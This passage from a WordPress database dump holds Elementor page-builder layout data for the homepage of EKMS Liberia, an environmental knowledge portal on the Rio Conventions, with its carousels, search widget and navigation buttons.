to\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(16914,2532,'_elementor_version','2.7.5'),(16915,2532,'_elementor_template_type','wp-page'),(16916,2532,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(16918,2533,'_wp_page_template','default'),(16919,2533,'_elementor_edit_mode','builder'),(16920,2533,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat 